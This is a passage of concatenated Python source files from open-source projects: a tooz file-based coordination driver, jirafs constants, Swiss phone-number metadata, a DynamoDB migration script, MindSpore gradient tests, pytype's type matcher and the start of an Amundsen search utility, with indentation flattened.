current_time = datetime.datetime.now()
delta_time = timeutils.delta_seconds(m_time,
current_time)
if delta_time >= 0 and delta_time <= self._timeout:
member_id = self._read_member_id(entry_path)
else:
continue
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
else:
members.add(member_id)
return members
fut = self._executor.submit(_do_get_members)
return FileFutureResult(fut)
def get_member_capabilities(self, group_id, member_id):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
safe_member_id = self._make_filesystem_safe(member_id)
member_path = os.path.join(group_dir, "%s.raw" % safe_member_id)
@_lock_me(self._driver_lock)
def _do_get_member_capabilities():
try:
with open(member_path, "rb") as fh:
contents = fh.read()
except EnvironmentError as e:
if e.errno == errno.ENOENT:
if not os.path.isdir(group_dir):
raise coordination.GroupNotCreated(group_id)
else:
raise coordination.MemberNotJoined(group_id,
member_id)
else:
raise
else:
details = self._load_and_validate(contents, 'member')
return details.get(u"capabilities")
fut = self._executor.submit(_do_get_member_capabilities)
return FileFutureResult(fut)
def delete_group(self, group_id):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
@_lock_me(self._driver_lock)
def _do_delete_group():
try:
entries = os.listdir(group_dir)
except EnvironmentError as e:
if e.errno == errno.ENOENT:
raise coordination.GroupNotCreated(group_id)
else:
raise
else:
if len(entries) > 1:
raise coordination.GroupNotEmpty(group_id)
elif len(entries) == 1 and entries != ['.metadata']:
raise tooz.ToozError(
"Unexpected path '%s' found in"
" group directory '%s' (expected to only find"
" a '.metadata' path)" % (entries[0], group_dir))
else:
try:
shutil.rmtree(group_dir)
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
fut = self._executor.submit(_do_delete_group)
return FileFutureResult(fut)
def _read_group_id(self, path):
with open(path, 'rb') as fh:
details = self._load_and_validate(fh.read(), 'group')
if details.get("encoded"):
return details[u'group_id'].decode("utf-8")
return details[u'group_id']
def get_groups(self):
def _do_get_groups():
groups = []
for entry in os.listdir(self._group_dir):
path = os.path.join(self._group_dir, entry, '.metadata')
try:
groups.append(self._read_group_id(path))
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
return groups
fut = self._executor.submit(_do_get_groups)
return FileFutureResult(fut)
def heartbeat(self):
for group_id in self._joined_groups:
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
member_path = os.path.join(group_dir, "%s.raw" %
self._safe_member_id)
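            # Touching the member file refreshes its mtime; get_members()
            # treats entries whose mtime is older than the timeout as gone.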
@_lock_me(self._driver_lock)
def _do_heartbeat():
try:
os.utime(member_path, None)
except EnvironmentError as err:
if err.errno != errno.ENOENT:
raise
_do_heartbeat()
return self._timeout
@staticmethod
def watch_elected_as_leader(group_id, callback):
raise tooz.NotImplemented
@staticmethod
def unwatch_elected_as_leader(group_id, callback):
raise tooz.NotImplemented
FileFutureResult = functools.partial(coordination.CoordinatorResult,
failure_translator=_translate_failures)

# ---- source: coddingtonbear/jirafs :: /jirafs/constants.py ----

from environmental_override import override # noqa
from jirafs import __version__ as version
# Metadata filenames
TICKET_DETAILS = "fields.jira"
TICKET_COMMENTS = "comments.read_only.jira"
TICKET_NEW_COMMENT = "new_comment.jira"
TICKET_LINKS = "links.jira"
TICKET_FILE_FIELD_TEMPLATE = "{field_name}.jira"
# Generic settings
LOCAL_ONLY_FILE = ".jirafs_local"
REMOTE_IGNORE_FILE = ".jirafs_remote_ignore"
GIT_IGNORE_FILE_PARTIAL = ".jirafs_ignore"
GIT_IGNORE_FILE = ".jirafs/combined_ignore"
GIT_EXCLUDE_FILE = ".jirafs/git/info/exclude"
TICKET_OPERATION_LOG = "operation.log"
METADATA_DIR = ".jirafs"
GLOBAL_CONFIG = ".jirafs_config"
TEMP_GENERATED_FILES = ".jirafs/temp-generated"
GIT_AUTHOR = "Jirafs %s <jirafs@localhost>" % (version)
DEFAULT_BRANCH = "master"
# Config sections
CONFIG_JIRA = "jira"
CONFIG_MAIN = "main"
CONFIG_PLUGINS = "plugins"
NO_DETAIL_FIELDS = ["comment", "watches", "attachment"]
FILE_FIELDS = [
"description",
]
FILE_FIELD_BLACKLIST = [
"new_comment",
"fields",
"links",
]
ALLOW_USER_INPUT = True
DEFAULT_DATE_FORMAT = "%Y-%m-%d at %H:%M:%S %Z"
CURRENT_REPO_VERSION = 17
override(locals(), "JIRAFS_")
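# A sketch of what the override enables (assuming environmental_override's
# documented behaviour): exporting JIRAFS_DEFAULT_BRANCH=main before this
# module is imported would replace DEFAULT_BRANCH above with "main".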

# ---- source: daviddrysdale/python-phonenumbers :: /python/phonenumbers/data/region_CH.py ----

"""Auto-generated file, do not edit by hand. CH metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_CH = PhoneMetadata(id='CH', country_code=41, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='8\\d{11}|[2-9]\\d{8}', possible_length=(9, 12)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:2[12467]|3[1-4]|4[134]|5[256]|6[12]|[7-9]1)\\d{7}', example_number='212345678', possible_length=(9,)),
mobile=PhoneNumberDesc(national_number_pattern='7[35-9]\\d{7}', example_number='781234567', possible_length=(9,)),
toll_free=PhoneNumberDesc(national_number_pattern='800\\d{6}', example_number='800123456', possible_length=(9,)),
premium_rate=PhoneNumberDesc(national_number_pattern='90[016]\\d{6}', example_number='900123456', possible_length=(9,)),
shared_cost=PhoneNumberDesc(national_number_pattern='84[0248]\\d{6}', example_number='840123456', possible_length=(9,)),
personal_number=PhoneNumberDesc(national_number_pattern='878\\d{6}', example_number='878123456', possible_length=(9,)),
pager=PhoneNumberDesc(national_number_pattern='74[0248]\\d{6}', example_number='740123456', possible_length=(9,)),
uan=PhoneNumberDesc(national_number_pattern='5[18]\\d{7}', example_number='581234567', possible_length=(9,)),
voicemail=PhoneNumberDesc(national_number_pattern='860\\d{9}', example_number='860123456789', possible_length=(12,)),
national_prefix='0',
national_prefix_for_parsing='0',
number_format=[NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['8[047]|90'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{2})(\\d{2})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['[2-79]|81'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{3})(\\d{2})(\\d{3})(\\d{2})(\\d{2})', format='\\1 \\2 \\3 \\4 \\5', leading_digits_pattern=['8'], national_prefix_formatting_rule='0\\1')],
mobile_number_portable_region=True)

# ---- source: keithrozario/Klayers :: /scripts/db_migration/update_build_items.py ----

"""
Add the package fields to build items.
Derived from the sk field
"""
import boto3
from boto3.dynamodb.conditions import Attr
profile = "KlayersProdP38"
# profile = 'KlayersDev'
config = {"table_name": "kl.Klayers-prodp38.db", "region": "us-east-2"}
# config = {'table_name': 'kl.Klayers-devp38.db', 'region': 'us-west-2'}
# config = {'table_name': 'kl.Klayers-defaultp38.db', 'region': 'ap-southeast-1'}
session = boto3.session.Session(profile_name=profile, region_name=config["region"])
dynamodb = session.resource("dynamodb")
table = dynamodb.Table(config["table_name"])
kwargs = {
"Select": "ALL_ATTRIBUTES",
"FilterExpression": Attr("pk").begins_with("bld"),
"ConsistentRead": False,
}
items = list()
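# Paginate through the full scan: DynamoDB returns at most 1 MB of items per
# page and signals that more remain via LastEvaluatedKey, which is fed back
# as ExclusiveStartKey until it is absent from the response.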
while True:
response = table.scan(**kwargs)
items.extend(response["Items"])
try:
kwargs["ExclusiveStartKey"] = response["LastEvaluatedKey"]
except KeyError:
break
with table.batch_writer() as batch:
for k, item in enumerate(items):
item["pckg"] = item["sk"][5:]
batch.put_item(Item=item)
if k % 10 == 0:
print(f"Written {k}/{len(items)} to {config['table_name']}")

# ---- source: mindspore-ai/mindspore :: /tests/st/ops/cpu/test_cdist_grad_op.py ----

# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
import mindspore.nn as nn
from mindspore import Tensor
from mindspore import context
from mindspore.ops.operations import _grad_ops as G
from mindspore.ops.functional import vmap
context.set_context(mode=context.GRAPH_MODE, device_target="CPU")
class CdistGradTEST(nn.Cell):
def __init__(self, p):
super(CdistGradTEST, self).__init__()
self.cdist_grad = G.CdistGrad(p)
def construct(self, grad, x1, x2, dist):
return self.cdist_grad(grad, x1, x2, dist)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_CdistGradP0_float32():
"""
    Feature: CdistGrad cpu kernel
    Description: test the cdist grad with p = 3.0.
    Expectation: the output matches the expected numpy result.
"""
cdist_grad = CdistGradTEST(3.)
grad = Tensor(np.array([[[1.0, 1.0], [2.0, 2.0]]]).astype(np.float32))
x1 = Tensor(np.array([[[1.0, 1.0], [2.0, 2.0]]]).astype(np.float32))
x2 = Tensor(np.array([[[3.0, 3.0], [3.0, 3.0]]]).astype(np.float32))
dist = Tensor(np.array([[[3.0, 3.0], [3.0, 3.0]]]).astype(np.float32))
output = cdist_grad(grad, x1, x2, dist)
expect = np.array(
[[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]]]).astype(np.float32)
print(output)
np.testing.assert_allclose(output.asnumpy(), expect, rtol=1e-3)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_vmap():
"""
Feature: cdist vmap.
    Description: test the correctness of the cdist vmap feature.
Expectation: Success.
"""
def cal_cdist_grad(grad, x1, x2, dist):
return G.CdistGrad(3.0)(grad, x1, x2, dist)
grad = Tensor(np.array([[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]]).astype(np.float32))
x1 = Tensor(np.array([[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]]).astype(np.float32))
x2 = Tensor(np.array([[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]]).astype(np.float32))
dist = Tensor(np.array([[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]]).astype(np.float32))
expect = np.array(
[[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]],
[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]]]).astype(np.float32)
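    # vmap with in_axes=0/out_axes=0 maps cal_cdist_grad over the leading
    # batch axis of every input and stacks the per-batch results on axis 0.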
vmap_ceil = vmap(cal_cdist_grad, in_axes=(0), out_axes=0)
output = vmap_ceil(grad, x1, x2, dist)
np.testing.assert_allclose(output.asnumpy(), expect, rtol=1e-3)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_vmap2():
"""
Feature: cdist vmap.
    Description: test the correctness of the cdist vmap feature.
Expectation: Success.
"""
def cal_cdist_grad(grad, x1, x2, dist):
return G.CdistGrad(3.0)(grad, x1, x2, dist)
grad = Tensor(np.array([[[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]],
[[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]]]).astype(np.float32))
x1 = Tensor(np.array([[[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]],
[[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]]]).astype(np.float32))
x2 = Tensor(np.array([[[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]],
[[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]]]).astype(np.float32))
dist = Tensor(np.array([[[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]],
[[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]]]).astype(np.float32))
expect = np.array(
[[[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]],
[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]]],
[[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]],
[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]]]]).astype(np.float32)
vmap_ceil = vmap(vmap(cal_cdist_grad, in_axes=(
0), out_axes=0), in_axes=(0), out_axes=0)
output = vmap_ceil(grad, x1, x2, dist)
np.testing.assert_allclose(output.asnumpy(), expect, rtol=1e-3)

# ---- source: google/pytype :: /pytype/pytd/type_match.py ----

"""Match pytd types against each other.
"Matching" x against y means roughly: If we have a function f(param: y) and
a type x, would we be able to pass (an instance of) x to f. (I.e.,
"execute f(x)"). So for example, str would "match" against basestring, and
list[int] would match against list[Number].
This is used for converting structural types to nominal types during type
inference, but could also be used when merging pytd files, to match existing
signatures against new inference results.
"""
import logging
from typing import Dict, Optional, Union
import attrs
from pytype import utils
from pytype.pytd import booleq
from pytype.pytd import escape
from pytype.pytd import pytd
from pytype.pytd import pytd_utils
from pytype.pytd import visitors
from pytype.pytd.parse import node
log = logging.getLogger(__name__)
is_complete = escape.is_complete
_SubstType = Dict[pytd.TypeParameter, Optional[pytd.Type]]
# This should be kept in sync with is_unknown below.
_UnknownType = Union[pytd.ClassType, pytd.NamedType, pytd.Class, "StrictType"]
# Might not be needed anymore once pytd has builtin support for ~unknown.
def is_unknown(t):
"""Return True if this is an ~unknown."""
if isinstance(t, (pytd.ClassType, pytd.NamedType, pytd.Class, StrictType)):
return escape.is_unknown(t.name)
elif isinstance(t, str):
return escape.is_unknown(t)
else:
return False
def get_all_subclasses(asts):
"""Compute a class->subclasses mapping.
Args:
asts: A list of ASTs.
Returns:
A dictionary, mapping instances of pytd.Type (types) to lists of
pytd.Class (the derived classes).
"""
hierarchy = {}
for ast in asts:
hierarchy.update(ast.Visit(visitors.ExtractSuperClasses()))
def filter_superclasses(superclasses):
return [superclass for superclass in superclasses
if is_complete(superclass)]
hierarchy = {cls: filter_superclasses(superclasses)
for cls, superclasses in hierarchy.items() if is_complete(cls)}
# typically this is a fairly short list, e.g.:
# [ClassType(basestring), ClassType(int), ClassType(object)]
return utils.invert_dict(hierarchy)
@attrs.frozen(slots=True, cache_hash=True)
class StrictType(node.Node):
"""A type that doesn't allow sub- or superclasses to match.
For example, "int" is considered a valid argument for a function that accepts
"object", but StrictType("int") is not.
"""
name: str
def __str__(self):
return self.name
class TypeMatch(pytd_utils.TypeMatcher):
"""Class for matching types against other types."""
def __init__(self, direct_subclasses=None, any_also_is_bottom=True):
"""Construct.
Args:
direct_subclasses: A dictionary, mapping pytd.Type to lists of pytd.Type.
any_also_is_bottom: Whether we should, (if True) consider
pytd.AnythingType() to also be at the bottom of the type hierarchy,
thus making it a subclass of everything, or (if False) to be only
at the top.
"""
self.direct_subclasses = direct_subclasses or {}
self.any_also_is_bottom = any_also_is_bottom
self.solver = booleq.Solver()
self._implications = {}
def default_match(self, t1, t2, *unused_args, **unused_kwargs):
# Don't allow pytd_utils.TypeMatcher to do default matching.
raise AssertionError(
f"Can't compare {type(t1).__name__} and {type(t2).__name__}")
def get_superclasses(self, t):
"""Get all base classes of this type.
Args:
t: A pytd.Type
Returns:
A list of pytd.Type.
"""
if isinstance(t, pytd.ClassType):
return sum((self.get_superclasses(c) for c in t.cls.bases), [t])
elif isinstance(t, pytd.AnythingType):
# All types, even "?", inherit from object.
return [pytd.NamedType("builtins.object")]
elif isinstance(t, pytd.GenericType):
return self.get_superclasses(t.base_type)
else:
log.warning("Can't extract superclasses from %s", type(t))
return [pytd.NamedType("builtins.object")]
def get_subclasses(self, t):
"""Get all classes derived from this type.
Args:
t: A pytd.Type
Returns:
A list of pytd.Type.
"""
if isinstance(t, pytd.ClassType):
subclasses = self.direct_subclasses.get(t, [])
return sum((self.get_subclasses(pytd.ClassType(c.name, c))
for c in subclasses), [t])
else:
raise NotImplementedError(f"Can't extract subclasses from {type(t)}")
def type_parameter(
self, unknown: _UnknownType, base_class: pytd.Class,
item: pytd.TemplateItem) -> StrictType:
"""This generates the type parameter when matching against a generic type.
For example, when we match ~unknown1 against list[T], we need an additional
type to model the T in "~unknown1[T]". This type would have the name
"~unknown1.list.T".
Args:
unknown: An unknown type. This is the type that's matched against
base_class[T].
base_class: The base class of the generic we're matching the unknown
against. E.g. "list".
item: The actual type parameter. ("T" in the examples above).
Returns:
A type (pytd.Node) to represent this type parameter.
"""
assert is_unknown(unknown)
name = unknown.name + "." + base_class.name + "." + item.type_param.name
# We do *not* consider subclasses or superclasses when matching type
# parameters.
# So for example, if we pass list[int] to f(x: list[T]), we assume that
# T can only be "int", not "int + object". This might be considered
# incorrect, but typically gives us more intuitive results.
# Note that this only happens if we match ~unknown against generic types,
# not for matching of "known" types against each other.
return StrictType(name)
def _get_parameters(self, t1, t2):
if isinstance(t1, pytd.TupleType) and isinstance(t2, pytd.TupleType):
# No change needed; the parameters will be compared element-wise.
return t1.parameters, t2.parameters
elif isinstance(t2, pytd.TupleType):
# Since we call _get_parameters after confirming that t1 and t2 have
# compatible base types, t1 is a homogeneous tuple here.
return (t1.element_type,) * len(t2.parameters), t2.parameters
elif isinstance(t1, pytd.TupleType):
return (pytd_utils.JoinTypes(t1.parameters),), t2.parameters
elif (isinstance(t1, pytd.CallableType) and
isinstance(t2, pytd.CallableType)):
# Flip the arguments, since argument types are contravariant.
return t2.args + (t1.ret,), t1.args + (t2.ret,)
elif (t1.base_type.cls.name == "builtins.type" and
t2.base_type.cls.name == "typing.Callable"):
# We'll only check the return type, since getting the argument types for
# initializing a class is tricky.
return t1.parameters, (t2.parameters[-1],)
elif (t1.base_type.cls.name == "typing.Callable" and
t2.base_type.cls.name == "builtins.type"):
return (t1.parameters[-1],), t2.parameters
elif isinstance(t1, pytd.CallableType):
# We're matching against GenericType(Callable, (Any, _RET)), so we don't
# need the argument types.
return (pytd.AnythingType(), t1.ret), t2.parameters
elif isinstance(t2, pytd.CallableType):
return t1.parameters, (pytd.AnythingType(), t2.ret)
else:
num_extra_params = len(t1.parameters) - len(t2.parameters)
# Matching, e.g., Dict[str, int] against Iterable[K] is legitimate.
assert num_extra_params >= 0, (t1.base_type.cls.name,
t2.base_type.cls.name)
t2_parameters = t2.parameters + (pytd.AnythingType(),) * num_extra_params
return t1.parameters, t2_parameters
def match_Generic_against_Generic( # pylint: disable=invalid-name
self, t1: pytd.GenericType, t2: pytd.GenericType, subst: _SubstType,
) -> booleq.BooleanTerm:
"""Match a pytd.GenericType against another pytd.GenericType."""
assert isinstance(t1.base_type, pytd.ClassType), type(t1.base_type)
assert isinstance(t2.base_type, pytd.ClassType), type(t2.base_type)
base1 = pytd.ClassType(t1.base_type.cls.name, t1.base_type.cls)
base2 = pytd.ClassType(t2.base_type.cls.name, t2.base_type.cls)
base_type_cmp = self.match_type_against_type(base1, base2, subst)
if base_type_cmp is booleq.FALSE:
return booleq.FALSE
t1_parameters, t2_parameters = self._get_parameters(t1, t2)
if len(t1_parameters) != len(t2_parameters):
return booleq.FALSE
# Type parameters are covariant:
# E.g. passing list[int] as argument for list[object] succeeds.
param_cmp = [self.match_type_against_type(p1, p2, subst)
for p1, p2 in zip(t1_parameters, t2_parameters)]
return booleq.And([base_type_cmp] + param_cmp)
def match_Unknown_against_Generic( # pylint: disable=invalid-name
self, t1: _UnknownType, t2: pytd.GenericType, subst: _SubstType
) -> booleq.BooleanTerm:
assert isinstance(t2.base_type, pytd.ClassType)
# No inheritance for base classes - you can only inherit from an
# instantiated template, but not from a template itself.
base_match = booleq.Eq(t1.name, t2.base_type.cls.name)
type_params = [self.type_parameter(t1, t2.base_type.cls, item)
for item in t2.base_type.cls.template]
for type_param in type_params:
self.solver.register_variable(type_param.name)
if isinstance(t2, pytd.TupleType):
t2_parameters = (pytd_utils.JoinTypes(t2.parameters),)
else:
t2_parameters = t2.parameters
params = [self.match_type_against_type(p1, p2, subst)
for p1, p2 in zip(type_params, t2_parameters)]
return booleq.And([base_match] + params)
def match_Generic_against_Unknown(self, t1, t2, subst): # pylint: disable=invalid-name
# Note: This flips p1 and p2 above.
return self.match_Unknown_against_Generic(t2, t1, subst) # pylint: disable=arguments-out-of-order
def maybe_lookup_type_param(self, t, subst):
while isinstance(t, pytd.TypeParameter):
# We can only have type parameters in a class, and if so, we should have
# added them to the type parameter substitution map (subst) beforehand:
assert t in subst
if subst[t] is None:
# Function type parameter. Can be anything.
t = pytd.AnythingType()
else:
assert subst[t] != t, "Cyclic type parameter."
t = subst[t]
return t
def unclass(self, t):
"""Prevent further subclass or superclass expansion for this type."""
if isinstance(t, pytd.ClassType):
# When t.name and t.cls.name differ (e.g., int vs. builtins.int), the
# latter is the complete name.
return pytd.NamedType(t.cls.name)
else:
return t
def expand_superclasses(self, t):
class_and_superclasses = self.get_superclasses(t)
return [self.unclass(t) for t in class_and_superclasses]
def expand_subclasses(self, t):
class_and_subclasses = self.get_subclasses(t)
return [self.unclass(t) for t in class_and_subclasses]
def match_type_against_type(self, t1, t2, subst):
types = (t1, t2, frozenset(subst.items()))
if types in self._implications:
return self._implications[types]
implication = self._implications[types] = self._match_type_against_type(
t1, t2, subst)
return implication
def _full_name(self, t):
return t.name
def _match_type_against_type(self, t1, t2, subst):
"""Match a pytd.Type against another pytd.Type."""
t1 = self.maybe_lookup_type_param(t1, subst)
t2 = self.maybe_lookup_type_param(t2, subst)
# TODO(b/159058933): Use utils:TypeMatcher to simplify this?
if isinstance(t2, pytd.AnythingType):
# We can match anything against AnythingType. (It's like top)
return booleq.TRUE
elif isinstance(t1, pytd.AnythingType):
if self.any_also_is_bottom:
# We can match AnythingType against everything. (It's like bottom)
return booleq.TRUE
else:
return booleq.FALSE
elif isinstance(t1, pytd.NothingType):
# nothing as an actual type matches against everything, since it
# represents an empty value.
return booleq.TRUE
elif isinstance(t2, pytd.NothingType):
# We can't match anything against nothing as an expected type (except
# nothing itself, above).
return booleq.FALSE
elif isinstance(t1, pytd.UnionType):
return booleq.And(self.match_type_against_type(u, t2, subst)
for u in t1.type_list)
elif isinstance(t2, pytd.UnionType):
return booleq.Or(self.match_type_against_type(t1, u, subst)
for u in t2.type_list)
elif (isinstance(t1, pytd.ClassType) and isinstance(t2, StrictType) or
isinstance(t1, StrictType) and isinstance(t2, pytd.ClassType)):
# For strict types, avoid subclasses of the left side.
return booleq.Eq(self._full_name(t1), self._full_name(t2))
elif isinstance(t1, pytd.ClassType) and t2.name == "builtins.object":
return booleq.TRUE
elif (t1.name in ("builtins.type", "typing.Callable") and
t2.name in ("builtins.type", "typing.Callable")):
return booleq.TRUE
elif isinstance(t1, pytd.ClassType):
# ClassTypes are similar to Unions, except they're disjunctions: We can
# match the type or any of its base classes against the formal parameter.
return booleq.Or(self.match_type_against_type(t, t2, subst)
for t in self.expand_superclasses(t1))
elif isinstance(t2, pytd.ClassType):
# ClassTypes on the right are exactly like Unions: We can match against
# this type or any of its subclasses.
return booleq.Or(self.match_type_against_type(t1, t, subst)
for t in self.expand_subclasses(t2))
assert not isinstance(t1, pytd.ClassType)
assert not isinstance(t2, pytd.ClassType)
if is_unknown(t1) and isinstance(t2, pytd.GenericType):
return self.match_Unknown_against_Generic(t1, t2, subst)
elif isinstance(t1, pytd.GenericType) and is_unknown(t2):
return self.match_Generic_against_Unknown(t1, t2, subst)
elif isinstance(t1, pytd.GenericType) and isinstance(t2, pytd.GenericType):
return self.match_Generic_against_Generic(t1, t2, subst)
elif isinstance(t1, pytd.GenericType):
# E.g. list[...] matches against list, or even object.
return self.match_type_against_type(t1.base_type, t2, subst)
elif isinstance(t2, pytd.GenericType):
if self.any_also_is_bottom:
# E.g. list (a.k.a. list[Any]) matches against list[str]
return self.match_type_against_type(t1, t2.base_type, subst)
else:
return booleq.FALSE
elif is_unknown(t1) and is_unknown(t2):
return booleq.Eq(t1.name, t2.name)
elif (isinstance(t1, (pytd.NamedType, StrictType)) and
isinstance(t2, (pytd.NamedType, StrictType))):
if is_complete(t1) and is_complete(t2) and t1.name != t2.name:
# Optimization: If we know these two can never be equal, just return
# false right away.
return booleq.FALSE
else:
return booleq.Eq(t1.name, t2.name)
elif isinstance(t1, pytd.NamedType) and isinstance(t2, pytd.Literal):
return booleq.FALSE
elif isinstance(t1, pytd.LateType) or isinstance(t2, pytd.LateType):
# Unresolved types never match against anything.
return booleq.FALSE
elif isinstance(t1, pytd.Literal) and isinstance(t2, pytd.Literal):
return booleq.TRUE if t1.value == t2.value else booleq.FALSE
else:
raise AssertionError(f"Don't know how to match {type(t1)} against "
f"{type(t2)}")
# pylint: disable=invalid-name
def match_Signature_against_Signature(self, sig1, sig2, subst,
skip_self=False):
"""Match a pytd.Signature against another pytd.Signature.
Args:
sig1: The caller
sig2: The callee
subst: Current type parameters.
skip_self: If True, doesn't compare the first parameter, which is
considered (and verified) to be "self".
Returns:
An instance of booleq.BooleanTerm, i.e. a boolean formula.
"""
# Signatures have type parameters, too. We ignore them, since they can
# be anything. (See maybe_lookup_type_param())
subst.update({p.type_param: None for p in sig1.template + sig2.template})
params1 = sig1.params
params2 = sig2.params
if skip_self:
# Methods in an ~unknown need to declare their methods with "self"
assert params1 and params1[0].name == "self"
params1 = params1[1:]
if params2 and params2[0].name == "self":
params2 = params2[1:]
equalities = []
if len(params1) > len(params2) and not sig2.has_optional:
return booleq.FALSE # extra parameters
if sig1.starargs is not None and sig2.starargs is not None:
equalities.append(self.match_type_against_type(
sig1.starargs.type, sig2.starargs.type, subst))
if sig1.starstarargs is not None and sig2.starstarargs is not None:
equalities.append(self.match_type_against_type(
sig1.starstarargs.type, sig2.starstarargs.type, subst))
# TODO(b/159058933): Handle kwonly parameters (on either side). Presumably,
# a kwonly on the left side means that it was a keyword param.
for p1, p2 in zip(params1, params2):
if p1.optional and not p2.optional:
return booleq.FALSE
for i, p2 in enumerate(params2):
if i >= len(params1):
if not p2.optional:
return booleq.FALSE # missing parameter
else:
pass
else:
p1 = params1[i]
if p1.name != p2.name and not (
pytd_utils.ANON_PARAM.match(p1.name) or
pytd_utils.ANON_PARAM.match(p2.name)):
return booleq.FALSE
equalities.append(self.match_type_against_type(p1.type, p2.type, subst))
equalities.append(
self.match_type_against_type(
sig1.return_type, sig2.return_type, subst))
return booleq.And(equalities)
def match_Signature_against_Function(self, sig, f, subst, skip_self=False): # pylint: disable=invalid-name
def make_or(inner):
return booleq.Or(
self.match_Signature_against_Signature(inner, s, subst, skip_self)
for s in f.signatures)
return booleq.And(make_or(inner) for inner in visitors.ExpandSignature(sig))
def match_Function_against_Function(self, f1, f2, subst, skip_self=False): # pylint: disable=invalid-name
return booleq.And(
self.match_Signature_against_Function(s1, f2, subst, skip_self)
for s1 in f1.signatures)
def match_Function_against_Class(self, f1, cls2, subst, cache):
cls2_methods = cache.get(id(cls2))
if cls2_methods is None:
cls2_methods = cache[id(cls2)] = {f.name: f for f in cls2.methods}
if f1.name not in cls2_methods:
# The class itself doesn't have this method, but base classes might.
# TODO(b/159058933): This should do MRO order, not depth-first.
for base in cls2.bases:
if isinstance(base, pytd.AnythingType):
# AnythingType can contain any method. However, that would mean that
# a class that inherits from AnythingType contains any method
# imaginable, and hence is a match for anything. To prevent the bad
# results caused by that, return FALSE here.
return booleq.FALSE
elif isinstance(base, (pytd.ClassType, pytd.GenericType)):
if isinstance(base, pytd.ClassType):
cls = base.cls
values = tuple(pytd.AnythingType() for _ in cls.template)
elif isinstance(base, pytd.TupleType):
cls = base.base_type.cls
values = (pytd_utils.JoinTypes(base.parameters),)
else:
cls = base.base_type.cls
values = base.parameters
if values:
subst = subst.copy()
for param, value in zip(cls.template, values):
subst[param.type_param] = value
implication = self.match_Function_against_Class(f1, cls, subst, cache)
if implication is not booleq.FALSE:
return implication
else:
# Funky types like UnionType are hard to match against (and shouldn't
# appear as a base class) so we treat them as catch-all.
log.warning("Assuming that %s has method %s",
pytd_utils.Print(base), f1.name)
return booleq.TRUE
return booleq.FALSE
else:
f2 = cls2_methods[f1.name]
return self.match_Function_against_Function(
f1, f2, subst, skip_self=True)
def match_Class_against_Class(self, cls1, cls2, subst): # pylint: disable=invalid-name
"""Match a pytd.Class against another pytd.Class."""
return self.match_Functions_against_Class(
cls1.methods, cls2, subst)
def match_Protocol_against_Unknown(self, protocol, unknown, subst): # pylint: disable=invalid-name
"""Match a typing.Protocol against an unknown class."""
filtered_methods = [f for f in protocol.methods if f.is_abstract]
return self.match_Functions_against_Class(
filtered_methods, unknown, subst)
def match_Functions_against_Class(self, methods, cls2, subst):
implications = []
cache = {}
for f1 in methods:
implication = self.match_Function_against_Class(f1, cls2, subst, cache)
implications.append(implication)
if implication is booleq.FALSE:
break
# TODO(b/159058933): class attributes
return booleq.And(implications)

# ---- source: alldatacenter/alldata :: /govern/data-meta/amundsen/frontend/amundsen_application/api/utils/search_utils.py ----

# Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import logging
from typing import Dict, List # noqa: F401
from http import HTTPStatus
from flask import current_app as app
from amundsen_application.api.utils.request_utils import request_search
from amundsen_common.models.search import Filter, SearchRequest
from amundsen_application.models.user import dump_user, load_user
LOGGER = logging.getLogger(__name__)
# These can move to a configuration when we have custom use cases outside of these default values
valid_search_fields = {
'table': {
'badges',
'column',
'database',
'schema',
'table',
'tag'
},
'dashboard': {
'group_name',
'name',
'product',
'tag'
},
'feature': {
'badges',
'entity',
'feature_name',
'feature_group',
'tags'
}
